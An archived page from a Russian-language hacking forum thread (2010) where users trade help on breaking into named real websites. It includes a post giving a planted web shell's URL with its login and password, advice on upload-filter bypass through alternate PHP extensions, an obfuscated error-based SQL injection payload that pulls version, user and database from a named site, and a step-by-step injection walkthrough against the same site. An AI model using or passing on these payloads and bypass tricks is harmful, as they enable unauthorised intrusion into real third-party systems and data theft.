FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1471 из 2422

1471

Опции темы

Поиск в этой теме

Опции просмотра

09.09.2010, 17:46

IMMORTAL_S

Новичок

Регистрация: 29.04.2010

Сообщений: 19

Провел на форуме:
58603

Репутация: 3

Всем привет!

Можно ли с помощью залитого на сайт swf создать/переименовать файл? (без обращения его например к php)

Надеюсь мой ход мысли понятен!?

...хотя думается мне, ответ будет отрицательным.

09.09.2010, 17:48

Shadrin

Постоянный

Регистрация: 20.08.2008

Сообщений: 348

Провел на форуме:
2200171

Репутация: 270

Отправить сообщение для Shadrin с помощью ICQ

DrakonHaSh у меня браузер предлагает его сохранить( шеллы и на питоне перле пробовал хренова дело,может кто знает как использовать альтернативные функции?

IMMORTAL_S swf же в браузере выполняется нечего не сделаешь,ищи другие пути...

09.09.2010, 18:08

blackhat

Guest

Сообщений: n/a

Провел на форуме:
562

Репутация: 0

Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345

Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?

09.09.2010, 18:09

-PRIVAT-

Участник форума

Регистрация: 17.04.2010

Сообщений: 221

Провел на форуме:
344917

Репутация: 17

Цитата:

Сообщение от molotovkeyt

molotovkeyt said:
http://ru.akella.com/Game.aspx?id=1%27
че дальше, кто подскажет?
не имел никогда дело с aspx-движками.

Тут нет уязвимости.

09.09.2010, 18:11

Shadrin

Постоянный

Регистрация: 20.08.2008

Сообщений: 348

Провел на форуме:
2200171

Репутация: 270

Цитата:

Сообщение от blackhat

blackhat said:
Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345
Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?

значит он там уже есть,лить в другую папку или .phtml .php3 это поробуй

09.09.2010, 18:14

blackhat

Guest

Сообщений: n/a

Провел на форуме:
562

Репутация: 0

Shadrin никакого эффекта =(

09.09.2010, 19:19

Axel_Ustus

Новичок

Регистрация: 04.06.2010

Сообщений: 0

Провел на форуме:
2864

Репутация: 0

http://www.xvideo.ru/catalog.php?product=588+order+by+1--

помогите раскрутить инъекцию

на union select никакой реакции

09.09.2010, 19:44

brutos

Новичок

Регистрация: 25.11.2009

Сообщений: 0

Провел на форуме:
68379

Репутация: 0

Axel_Ustus:

http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat((SeLEcT+concat_ws(0x3a,vers ion(),user(),database())),rAnD(0)|0)+hAvInG+miN(0) */

09.09.2010, 19:55

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Axel_Ustus:

Конечно, тебе дали решение задачки, но если тебе вдруг интересно не получение доступа к бд, а причина, по которой не работает union, то ответ таков:

1) При запросе "order by 2" нам возвращается sql запрос:

Код:

Code:
select categories_id from t_products_to_categories where product_id = 589 order by 2--

И мы видим, что запрашивается одно поле

2) Закроем запрос

Код:

Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1

3) Попробуем написать union select после закрытия:

Код:

Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union select

Мы видим ошибку, следовательно union select блочится

4)

Код:

Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union(select

Ошибки нет

5)

Код:

Code:
http://www.xvideo.ru/catalog.php?product=589 union(select 1) -- 1

И запрос, который нам вернулся:

Код:

Code:
select name,description from t_products_items where products_id = 589 union(select 1) -- 1 order by order_id LIMIT 2

Из этого следует, что тут несколько запросов, и union работать не будет)

#10

09.09.2010, 20:06

Axel_Ustus

Новичок

Регистрация: 04.06.2010

Сообщений: 0

Провел на форуме:
2864

Репутация: 0

спасибо kamaz)

мне была интересна именно причина

Страница 1471 из 2422

1471

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ